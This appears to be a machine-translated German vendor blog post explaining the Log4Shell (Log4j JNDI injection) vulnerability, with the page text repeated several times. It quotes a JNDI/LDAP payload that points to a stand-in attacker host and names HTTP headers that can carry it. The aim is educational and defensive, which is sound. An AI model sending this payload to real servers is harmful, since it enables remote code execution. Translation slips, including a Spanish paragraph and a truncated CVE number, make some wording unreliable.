SCW-Symbole
Held-Hintergrund ohne Trennlinie
Blog

Erklärung der Log4j-Sicherheitslücke: Angriffsvektor und Präventionsmaßnahmen

Laura Verheyde
Veröffentlicht Jan 16, 2022
Zuletzt aktualisiert am 06. März 2026

Am 9. Dezember wurde ein Zero-Day-Exploit in der Java-Bibliothek Log4j entdeckt. CVE-44228, auch bekannt als Log4Shell, wurde als „hochgradig kritisch“ eingestuft, da der Exploit die Remote-Ausführung von Code (RAZA) ermöglichen kann. Darüber hinaus ist log4j-core eine der am häufigsten verwendeten Java-Protokollbibliotheken und gefährdet somit Millionen von Anwendungen.

Möchten Sie Ihre Fähigkeiten im Umgang mit Log4Shell schnell verbessern?

Wir haben eine Präsentation erstellt, die Sie von der Grundidee von Log4Shell bis hin zur Erfahrung, wie diese Schwachstelle in einem Simulator namens Mission ausgenutzt wird, führt. In dieser Mission zeigen wir Ihnen, wie sich die Log4j-Sicherheitslücke auf Ihre Infrastruktur und Anwendungen auswirken kann. Klicken Sie hier, um direkt zur Präsentation zu gelangen, oder lesen Sie weiter, um mehr über die Sicherheitslücke im Detail zu erfahren.

Alte Nachrichten?

Der Exploit ist nicht neu. Bereits in ihrem Vortrag auf der BlackHat 2016 betonten die Sicherheitsforscher Álvaro Muñoz und Oleksandr Mirosh,dass „Anwendungen keine JNDI-Suchen mit nicht vertrauenswürdigen Daten durchführen sollten”, und veranschaulichten, wie eine bestimmte JNDI/LDAP-Injektion zur Remote-Ausführung von Code führen könnte. Und genau das ist der Kern von Log4Shell.

Angriffsvektor

Die Nutzlast der Log4Shell-Injektion sieht wie folgt aus:

$ {jndi:ldap: //attacker.host/xyz}

Para entender esto necesitamos conocer el lenguaje de expresión (EL) de Java. Expresiones escritas en la siguiente sintaxis: $ {expr} se evaluará en tiempo de ejecución. Por ejemplo, $ {java:version} devolverá la versión de Java que se está utilizando.

Als Nächstes kommt JNDI, oder Java Naming and Directory Interface, eine API, die es ermöglicht, sich über Protokolle wie LDAP, DNS, RMI usw. mit Diensten zu verbinden, um Daten oder Ressourcen abzurufen. Einfach ausgedrückt führt JNDI im obigen Beispiel zu bösartigen Payloads eine Suche auf dem vom Angreifer kontrollierten LDAP-Server durch. Die Antwort könnte beispielsweise auf eine Java-Klassendatei verweisen, die bösartigen Code enthält, der wiederum auf dem anfälligen Server ausgeführt wird.

Was diese Schwachstelle so problematisch macht, ist, dass Log4j alle Protokolleinträge auswertet und alle Einträge registrierter Benutzer sucht, die in der EL-Syntax mit dem Präfix „jndi” geschrieben sind. Die Nutzlast kann überall dort eingefügt werden, wo Benutzer Daten eingeben können, z. B. in Formularfeldern. Darüber hinaus können HTTP-Header wie User-Agent und X-Forwarded-For sowie andere Header so angepasst werden, dass sie die Nutzlast transportieren.

Um den Exploit selbst auszuprobieren, gehen Sie zu unserer Präsentation und fahren Sie mit Schritt 2 fort: „Auswirkungen der Erfahrung”.

Prävention: Sensibilisierung

Das Update wird für alle Anwendungen empfohlen, da Log4j den anfälligen Code repariert hat. Die Versionen 2.15.0 und 2.16.0 enthielten jedoch einen DDoS-Angriff und andere Schwachstellen, sodass Ende Dezember ein Update auf 2.17.0 empfohlen wird.

Als Entwickler, die Code schreiben, müssen wir jederzeit die Sicherheit im Auge behalten. Log4Shell hat uns gelehrt, dass die Verwendung von Frameworks oder Bibliotheken von Drittanbietern Risiken mit sich bringt. Wir müssen uns bewusst sein, dass die Sicherheit unserer Anwendung gefährdet sein kann, wenn wir externe Quellen verwenden, von denen wir naiv annehmen, dass sie sicher sind.

Hätte diese Schwachstelle vermieden werden können? Ja und nein. Einerseits können Entwickler nur begrenzt etwas tun, wenn die anfälligen Komponenten über Software von Drittanbietern eingeführt werden. Andererseits ist die Lehre, die daraus gezogen wurde, eine Lehre, die sich immer wieder wiederholt hat, nämlich dass man sich niemals auf die Meinungen der Nutzer verlassen sollte.

Secure Code Warrior , dass sicherheitsbewusste Entwickler der beste Weg sind, um Schwachstellen im Code zu vermeiden. Da SCW skalierbare und spezifische Schulungen für das Programmierframework anbietet, konnten Unternehmenskunden anhand der Daten aus den Berichten schnell herausfinden, welche Java-Entwickler betroffen sind. Außerdem vertrauten sie auf ihre bei SCW geschulten Sicherheitsexperten, um die Aktualisierung von Log4j zu beschleunigen.

Insbesondere für Java-Entwickler Secure Code Warrior Sensei, ein kostenloses IntelliJ-Plugin. Dieses regelbasierte Code-Analyse-Tool kann verwendet werden, um Codierungsrichtlinien durchzusetzen und Schwachstellen zu verhindern und zu beheben. Sie können Ihre eigenen Regeln erstellen oder unsere vorgefertigten Kochbücher verwenden. Stöbern Sie in unseren Rezepten und vergessen Sie nicht, unser Log4j-Kochbuch herunterzuladen, mit dem Sie die Log4Shell-Sicherheitslücke im Handumdrehen finden und beheben können.

Verbessere deine Fähigkeiten, indem du dich gegen Log4Shell verteidigst.

Möchten Sie das in diesem Blogbeitrag Gelernte in die Praxis umsetzen? Unser Schaufenster kann Ihnen dabei helfen. Zu Beginn der Präsentation geben wir einen kurzen Überblick über diese Schwachstelle und greifen anschließend auf eine simulierte Umgebung zu, in der Sie den Exploit anhand von Anweisungen ausprobieren können.


Siehe Ressource
Siehe Ressource

Im Dezember 2021 wurde eine kritische Sicherheitslücke namens Log4Shell in der Java-Bibliothek Log4j entdeckt. In diesem Artikel erklären wir Ihnen die Sicherheitslücke Log4Shell auf möglichst einfache Weise, damit Sie die Grundlagen verstehen, und stellen Ihnen eine Aufgabe vor: ein Spielfeld, auf dem Sie versuchen können, eine simulierte Website mit Ihrem Wissen über diese Sicherheitslücke auszunutzen.

Interessiert an mehr?

mehr erfahren

Secure Code Warrior hier, um Ihrem Unternehmen dabei zu helfen, den Code während des gesamten Lebenszyklus der Softwareentwicklung zu schützen und eine Kultur zu schaffen, in der Cybersicherheit oberste Priorität hat. Ganz gleich, ob Sie AppSec-Administrator, Entwickler, CISO oder in einem anderen Bereich der Sicherheit tätig sind – wir können Ihrem Unternehmen dabei helfen, die mit unsicherem Code verbundenen Risiken zu reduzieren.

Eine Vorführung buchen
Teilen auf:
LinkedIn-MarkenSozialx Logo
Autor
Laura Verheyde
Veröffentlicht Jan 16, 2022

Laura Verheyde ist Softwareentwicklerin bei Secure Code Warrior und beschäftigt sich mit der Erforschung von Schwachstellen und der Erstellung von Inhalten für Missions und Coding Labs.

Teilen auf:
LinkedIn-MarkenSozialx Logo

Am 9. Dezember wurde ein Zero-Day-Exploit in der Java-Bibliothek Log4j entdeckt. CVE-44228, auch bekannt als Log4Shell, wurde als „hochgradig kritisch“ eingestuft, da der Exploit die Remote-Ausführung von Code (RAZA) ermöglichen kann. Darüber hinaus ist log4j-core eine der am häufigsten verwendeten Java-Protokollbibliotheken und gefährdet somit Millionen von Anwendungen.

Möchten Sie Ihre Fähigkeiten im Umgang mit Log4Shell schnell verbessern?

Wir haben eine Präsentation erstellt, die Sie von der Grundidee von Log4Shell bis hin zur Erfahrung, wie diese Schwachstelle in einem Simulator namens Mission ausgenutzt wird, führt. In dieser Mission zeigen wir Ihnen, wie sich die Log4j-Sicherheitslücke auf Ihre Infrastruktur und Anwendungen auswirken kann. Klicken Sie hier, um direkt zur Präsentation zu gelangen, oder lesen Sie weiter, um mehr über die Sicherheitslücke im Detail zu erfahren.

Alte Nachrichten?

Der Exploit ist nicht neu. Bereits in ihrem Vortrag auf der BlackHat 2016 betonten die Sicherheitsforscher Álvaro Muñoz und Oleksandr Mirosh,dass „Anwendungen keine JNDI-Suchen mit nicht vertrauenswürdigen Daten durchführen sollten”, und veranschaulichten, wie eine bestimmte JNDI/LDAP-Injektion zur Remote-Ausführung von Code führen könnte. Und genau das ist der Kern von Log4Shell.

Angriffsvektor

Die Nutzlast der Log4Shell-Injektion sieht wie folgt aus:

$ {jndi:ldap: //attacker.host/xyz}

Para entender esto necesitamos conocer el lenguaje de expresión (EL) de Java. Expresiones escritas en la siguiente sintaxis: $ {expr} se evaluará en tiempo de ejecución. Por ejemplo, $ {java:version} devolverá la versión de Java que se está utilizando.

Als Nächstes kommt JNDI, oder Java Naming and Directory Interface, eine API, die es ermöglicht, sich über Protokolle wie LDAP, DNS, RMI usw. mit Diensten zu verbinden, um Daten oder Ressourcen abzurufen. Einfach ausgedrückt führt JNDI im obigen Beispiel zu bösartigen Payloads eine Suche auf dem vom Angreifer kontrollierten LDAP-Server durch. Die Antwort könnte beispielsweise auf eine Java-Klassendatei verweisen, die bösartigen Code enthält, der wiederum auf dem anfälligen Server ausgeführt wird.

Was diese Schwachstelle so problematisch macht, ist, dass Log4j alle Protokolleinträge auswertet und alle Einträge registrierter Benutzer sucht, die in der EL-Syntax mit dem Präfix „jndi” geschrieben sind. Die Nutzlast kann überall dort eingefügt werden, wo Benutzer Daten eingeben können, z. B. in Formularfeldern. Darüber hinaus können HTTP-Header wie User-Agent und X-Forwarded-For sowie andere Header so angepasst werden, dass sie die Nutzlast transportieren.

Um den Exploit selbst auszuprobieren, gehen Sie zu unserer Präsentation und fahren Sie mit Schritt 2 fort: „Auswirkungen der Erfahrung”.

Prävention: Sensibilisierung

Das Update wird für alle Anwendungen empfohlen, da Log4j den anfälligen Code repariert hat. Die Versionen 2.15.0 und 2.16.0 enthielten jedoch einen DDoS-Angriff und andere Schwachstellen, sodass Ende Dezember ein Update auf 2.17.0 empfohlen wird.

Als Entwickler, die Code schreiben, müssen wir jederzeit die Sicherheit im Auge behalten. Log4Shell hat uns gelehrt, dass die Verwendung von Frameworks oder Bibliotheken von Drittanbietern Risiken mit sich bringt. Wir müssen uns bewusst sein, dass die Sicherheit unserer Anwendung gefährdet sein kann, wenn wir externe Quellen verwenden, von denen wir naiv annehmen, dass sie sicher sind.

Hätte diese Schwachstelle vermieden werden können? Ja und nein. Einerseits können Entwickler nur begrenzt etwas tun, wenn die anfälligen Komponenten über Software von Drittanbietern eingeführt werden. Andererseits ist die Lehre, die daraus gezogen wurde, eine Lehre, die sich immer wieder wiederholt hat, nämlich dass man sich niemals auf die Meinungen der Nutzer verlassen sollte.

Secure Code Warrior , dass sicherheitsbewusste Entwickler der beste Weg sind, um Schwachstellen im Code zu vermeiden. Da SCW skalierbare und spezifische Schulungen für das Programmierframework anbietet, konnten Unternehmenskunden anhand der Daten aus den Berichten schnell herausfinden, welche Java-Entwickler betroffen sind. Außerdem vertrauten sie auf ihre bei SCW geschulten Sicherheitsexperten, um die Aktualisierung von Log4j zu beschleunigen.

Insbesondere für Java-Entwickler Secure Code Warrior Sensei, ein kostenloses IntelliJ-Plugin. Dieses regelbasierte Code-Analyse-Tool kann verwendet werden, um Codierungsrichtlinien durchzusetzen und Schwachstellen zu verhindern und zu beheben. Sie können Ihre eigenen Regeln erstellen oder unsere vorgefertigten Kochbücher verwenden. Stöbern Sie in unseren Rezepten und vergessen Sie nicht, unser Log4j-Kochbuch herunterzuladen, mit dem Sie die Log4Shell-Sicherheitslücke im Handumdrehen finden und beheben können.

Verbessere deine Fähigkeiten, indem du dich gegen Log4Shell verteidigst.

Möchten Sie das in diesem Blogbeitrag Gelernte in die Praxis umsetzen? Unser Schaufenster kann Ihnen dabei helfen. Zu Beginn der Präsentation geben wir einen kurzen Überblick über diese Schwachstelle und greifen anschließend auf eine simulierte Umgebung zu, in der Sie den Exploit anhand von Anweisungen ausprobieren können.


Siehe Ressource
Siehe Ressource

Füllen Sie das folgende Formular aus, um den Bericht herunterzuladen.

Wir möchten Ihre Erlaubnis einholen, Ihnen Informationen über unsere Produkte oder Themen im Zusammenhang mit sicherer Verschlüsselung zuzusenden. Wir werden Ihre personenbezogenen Daten stets mit größter Sorgfalt behandeln und niemals zu Marketingzwecken an andere Unternehmen verkaufen.

Senden
scw Erfolgssymbol
scw-Fehlersymbol
Um das Formular zu senden, aktivieren Sie bitte die „Analyse“-Cookies. Sie können diese nach Abschluss des Vorgangs wieder deaktivieren.

Am 9. Dezember wurde ein Zero-Day-Exploit in der Java-Bibliothek Log4j entdeckt. CVE-44228, auch bekannt als Log4Shell, wurde als „hochgradig kritisch“ eingestuft, da der Exploit die Remote-Ausführung von Code (RAZA) ermöglichen kann. Darüber hinaus ist log4j-core eine der am häufigsten verwendeten Java-Protokollbibliotheken und gefährdet somit Millionen von Anwendungen.

Möchten Sie Ihre Fähigkeiten im Umgang mit Log4Shell schnell verbessern?

Wir haben eine Präsentation erstellt, die Sie von der Grundidee von Log4Shell bis hin zur Erfahrung, wie diese Schwachstelle in einem Simulator namens Mission ausgenutzt wird, führt. In dieser Mission zeigen wir Ihnen, wie sich die Log4j-Sicherheitslücke auf Ihre Infrastruktur und Anwendungen auswirken kann. Klicken Sie hier, um direkt zur Präsentation zu gelangen, oder lesen Sie weiter, um mehr über die Sicherheitslücke im Detail zu erfahren.

Alte Nachrichten?

Der Exploit ist nicht neu. Bereits in ihrem Vortrag auf der BlackHat 2016 betonten die Sicherheitsforscher Álvaro Muñoz und Oleksandr Mirosh,dass „Anwendungen keine JNDI-Suchen mit nicht vertrauenswürdigen Daten durchführen sollten”, und veranschaulichten, wie eine bestimmte JNDI/LDAP-Injektion zur Remote-Ausführung von Code führen könnte. Und genau das ist der Kern von Log4Shell.

Angriffsvektor

Die Nutzlast der Log4Shell-Injektion sieht wie folgt aus:

$ {jndi:ldap: //attacker.host/xyz}

Para entender esto necesitamos conocer el lenguaje de expresión (EL) de Java. Expresiones escritas en la siguiente sintaxis: $ {expr} se evaluará en tiempo de ejecución. Por ejemplo, $ {java:version} devolverá la versión de Java que se está utilizando.

Als Nächstes kommt JNDI, oder Java Naming and Directory Interface, eine API, die es ermöglicht, sich über Protokolle wie LDAP, DNS, RMI usw. mit Diensten zu verbinden, um Daten oder Ressourcen abzurufen. Einfach ausgedrückt führt JNDI im obigen Beispiel zu bösartigen Payloads eine Suche auf dem vom Angreifer kontrollierten LDAP-Server durch. Die Antwort könnte beispielsweise auf eine Java-Klassendatei verweisen, die bösartigen Code enthält, der wiederum auf dem anfälligen Server ausgeführt wird.

Was diese Schwachstelle so problematisch macht, ist, dass Log4j alle Protokolleinträge auswertet und alle Einträge registrierter Benutzer sucht, die in der EL-Syntax mit dem Präfix „jndi” geschrieben sind. Die Nutzlast kann überall dort eingefügt werden, wo Benutzer Daten eingeben können, z. B. in Formularfeldern. Darüber hinaus können HTTP-Header wie User-Agent und X-Forwarded-For sowie andere Header so angepasst werden, dass sie die Nutzlast transportieren.

Um den Exploit selbst auszuprobieren, gehen Sie zu unserer Präsentation und fahren Sie mit Schritt 2 fort: „Auswirkungen der Erfahrung”.

Prävention: Sensibilisierung

Das Update wird für alle Anwendungen empfohlen, da Log4j den anfälligen Code repariert hat. Die Versionen 2.15.0 und 2.16.0 enthielten jedoch einen DDoS-Angriff und andere Schwachstellen, sodass Ende Dezember ein Update auf 2.17.0 empfohlen wird.

Als Entwickler, die Code schreiben, müssen wir jederzeit die Sicherheit im Auge behalten. Log4Shell hat uns gelehrt, dass die Verwendung von Frameworks oder Bibliotheken von Drittanbietern Risiken mit sich bringt. Wir müssen uns bewusst sein, dass die Sicherheit unserer Anwendung gefährdet sein kann, wenn wir externe Quellen verwenden, von denen wir naiv annehmen, dass sie sicher sind.

Hätte diese Schwachstelle vermieden werden können? Ja und nein. Einerseits können Entwickler nur begrenzt etwas tun, wenn die anfälligen Komponenten über Software von Drittanbietern eingeführt werden. Andererseits ist die Lehre, die daraus gezogen wurde, eine Lehre, die sich immer wieder wiederholt hat, nämlich dass man sich niemals auf die Meinungen der Nutzer verlassen sollte.

Secure Code Warrior , dass sicherheitsbewusste Entwickler der beste Weg sind, um Schwachstellen im Code zu vermeiden. Da SCW skalierbare und spezifische Schulungen für das Programmierframework anbietet, konnten Unternehmenskunden anhand der Daten aus den Berichten schnell herausfinden, welche Java-Entwickler betroffen sind. Außerdem vertrauten sie auf ihre bei SCW geschulten Sicherheitsexperten, um die Aktualisierung von Log4j zu beschleunigen.

Insbesondere für Java-Entwickler Secure Code Warrior Sensei, ein kostenloses IntelliJ-Plugin. Dieses regelbasierte Code-Analyse-Tool kann verwendet werden, um Codierungsrichtlinien durchzusetzen und Schwachstellen zu verhindern und zu beheben. Sie können Ihre eigenen Regeln erstellen oder unsere vorgefertigten Kochbücher verwenden. Stöbern Sie in unseren Rezepten und vergessen Sie nicht, unser Log4j-Kochbuch herunterzuladen, mit dem Sie die Log4Shell-Sicherheitslücke im Handumdrehen finden und beheben können.

Verbessere deine Fähigkeiten, indem du dich gegen Log4Shell verteidigst.

Möchten Sie das in diesem Blogbeitrag Gelernte in die Praxis umsetzen? Unser Schaufenster kann Ihnen dabei helfen. Zu Beginn der Präsentation geben wir einen kurzen Überblick über diese Schwachstelle und greifen anschließend auf eine simulierte Umgebung zu, in der Sie den Exploit anhand von Anweisungen ausprobieren können.


Webinar ansehen
Beginnen
mehr erfahren

Klicken Sie auf den untenstehenden Link und laden Sie die PDF-Datei dieser Ressource herunter.

Secure Code Warrior hier, um Ihrem Unternehmen dabei zu helfen, den Code während des gesamten Lebenszyklus der Softwareentwicklung zu schützen und eine Kultur zu schaffen, in der Cybersicherheit oberste Priorität hat. Ganz gleich, ob Sie AppSec-Administrator, Entwickler, CISO oder in einem anderen Bereich der Sicherheit tätig sind – wir können Ihrem Unternehmen dabei helfen, die mit unsicherem Code verbundenen Risiken zu reduzieren.

Bericht anzeigenEine Vorführung buchen
Siehe Ressource
Teilen auf:
LinkedIn-MarkenSozialx Logo
Interessiert an mehr?

Teilen auf:
LinkedIn-MarkenSozialx Logo
Autor
Laura Verheyde
Veröffentlicht Jan 16, 2022

Laura Verheyde ist Softwareentwicklerin bei Secure Code Warrior und beschäftigt sich mit der Erforschung von Schwachstellen und der Erstellung von Inhalten für Missions und Coding Labs.

Teilen auf:
LinkedIn-MarkenSozialx Logo

Am 9. Dezember wurde ein Zero-Day-Exploit in der Java-Bibliothek Log4j entdeckt. CVE-44228, auch bekannt als Log4Shell, wurde als „hochgradig kritisch“ eingestuft, da der Exploit die Remote-Ausführung von Code (RAZA) ermöglichen kann. Darüber hinaus ist log4j-core eine der am häufigsten verwendeten Java-Protokollbibliotheken und gefährdet somit Millionen von Anwendungen.

Möchten Sie Ihre Fähigkeiten im Umgang mit Log4Shell schnell verbessern?

Wir haben eine Präsentation erstellt, die Sie von der Grundidee von Log4Shell bis hin zur Erfahrung, wie diese Schwachstelle in einem Simulator namens Mission ausgenutzt wird, führt. In dieser Mission zeigen wir Ihnen, wie sich die Log4j-Sicherheitslücke auf Ihre Infrastruktur und Anwendungen auswirken kann. Klicken Sie hier, um direkt zur Präsentation zu gelangen, oder lesen Sie weiter, um mehr über die Sicherheitslücke im Detail zu erfahren.

Alte Nachrichten?

Der Exploit ist nicht neu. Bereits in ihrem Vortrag auf der BlackHat 2016 betonten die Sicherheitsforscher Álvaro Muñoz und Oleksandr Mirosh,dass „Anwendungen keine JNDI-Suchen mit nicht vertrauenswürdigen Daten durchführen sollten”, und veranschaulichten, wie eine bestimmte JNDI/LDAP-Injektion zur Remote-Ausführung von Code führen könnte. Und genau das ist der Kern von Log4Shell.

Angriffsvektor

Die Nutzlast der Log4Shell-Injektion sieht wie folgt aus:

$ {jndi:ldap: //attacker.host/xyz}

Para entender esto necesitamos conocer el lenguaje de expresión (EL) de Java. Expresiones escritas en la siguiente sintaxis: $ {expr} se evaluará en tiempo de ejecución. Por ejemplo, $ {java:version} devolverá la versión de Java que se está utilizando.

Als Nächstes kommt JNDI, oder Java Naming and Directory Interface, eine API, die es ermöglicht, sich über Protokolle wie LDAP, DNS, RMI usw. mit Diensten zu verbinden, um Daten oder Ressourcen abzurufen. Einfach ausgedrückt führt JNDI im obigen Beispiel zu bösartigen Payloads eine Suche auf dem vom Angreifer kontrollierten LDAP-Server durch. Die Antwort könnte beispielsweise auf eine Java-Klassendatei verweisen, die bösartigen Code enthält, der wiederum auf dem anfälligen Server ausgeführt wird.

Was diese Schwachstelle so problematisch macht, ist, dass Log4j alle Protokolleinträge auswertet und alle Einträge registrierter Benutzer sucht, die in der EL-Syntax mit dem Präfix „jndi” geschrieben sind. Die Nutzlast kann überall dort eingefügt werden, wo Benutzer Daten eingeben können, z. B. in Formularfeldern. Darüber hinaus können HTTP-Header wie User-Agent und X-Forwarded-For sowie andere Header so angepasst werden, dass sie die Nutzlast transportieren.

Um den Exploit selbst auszuprobieren, gehen Sie zu unserer Präsentation und fahren Sie mit Schritt 2 fort: „Auswirkungen der Erfahrung”.

Prävention: Sensibilisierung

Das Update wird für alle Anwendungen empfohlen, da Log4j den anfälligen Code repariert hat. Die Versionen 2.15.0 und 2.16.0 enthielten jedoch einen DDoS-Angriff und andere Schwachstellen, sodass Ende Dezember ein Update auf 2.17.0 empfohlen wird.

Als Entwickler, die Code schreiben, müssen wir jederzeit die Sicherheit im Auge behalten. Log4Shell hat uns gelehrt, dass die Verwendung von Frameworks oder Bibliotheken von Drittanbietern Risiken mit sich bringt. Wir müssen uns bewusst sein, dass die Sicherheit unserer Anwendung gefährdet sein kann, wenn wir externe Quellen verwenden, von denen wir naiv annehmen, dass sie sicher sind.

Hätte diese Schwachstelle vermieden werden können? Ja und nein. Einerseits können Entwickler nur begrenzt etwas tun, wenn die anfälligen Komponenten über Software von Drittanbietern eingeführt werden. Andererseits ist die Lehre, die daraus gezogen wurde, eine Lehre, die sich immer wieder wiederholt hat, nämlich dass man sich niemals auf die Meinungen der Nutzer verlassen sollte.

Secure Code Warrior , dass sicherheitsbewusste Entwickler der beste Weg sind, um Schwachstellen im Code zu vermeiden. Da SCW skalierbare und spezifische Schulungen für das Programmierframework anbietet, konnten Unternehmenskunden anhand der Daten aus den Berichten schnell herausfinden, welche Java-Entwickler betroffen sind. Außerdem vertrauten sie auf ihre bei SCW geschulten Sicherheitsexperten, um die Aktualisierung von Log4j zu beschleunigen.

Insbesondere für Java-Entwickler Secure Code Warrior Sensei, ein kostenloses IntelliJ-Plugin. Dieses regelbasierte Code-Analyse-Tool kann verwendet werden, um Codierungsrichtlinien durchzusetzen und Schwachstellen zu verhindern und zu beheben. Sie können Ihre eigenen Regeln erstellen oder unsere vorgefertigten Kochbücher verwenden. Stöbern Sie in unseren Rezepten und vergessen Sie nicht, unser Log4j-Kochbuch herunterzuladen, mit dem Sie die Log4Shell-Sicherheitslücke im Handumdrehen finden und beheben können.

Verbessere deine Fähigkeiten, indem du dich gegen Log4Shell verteidigst.

Möchten Sie das in diesem Blogbeitrag Gelernte in die Praxis umsetzen? Unser Schaufenster kann Ihnen dabei helfen. Zu Beginn der Präsentation geben wir einen kurzen Überblick über diese Schwachstelle und greifen anschließend auf eine simulierte Umgebung zu, in der Sie den Exploit anhand von Anweisungen ausprobieren können.


Inhaltsverzeichnis

PDF herunterladen
Siehe Ressource
Interessiert an mehr?

mehr erfahren

Secure Code Warrior hier, um Ihrem Unternehmen dabei zu helfen, den Code während des gesamten Lebenszyklus der Softwareentwicklung zu schützen und eine Kultur zu schaffen, in der Cybersicherheit oberste Priorität hat. Ganz gleich, ob Sie AppSec-Administrator, Entwickler, CISO oder in einem anderen Bereich der Sicherheit tätig sind – wir können Ihrem Unternehmen dabei helfen, die mit unsicherem Code verbundenen Risiken zu reduzieren.

Eine Vorführung buchenHerunterladen
Teilen auf:
LinkedIn-MarkenSozialx Logo
Ressourcenzentrum

Ressourcen für den Einstieg

Weitere Veröffentlichungen
Ressourcenzentrum

Ressourcen für den Einstieg

Weitere Veröffentlichungen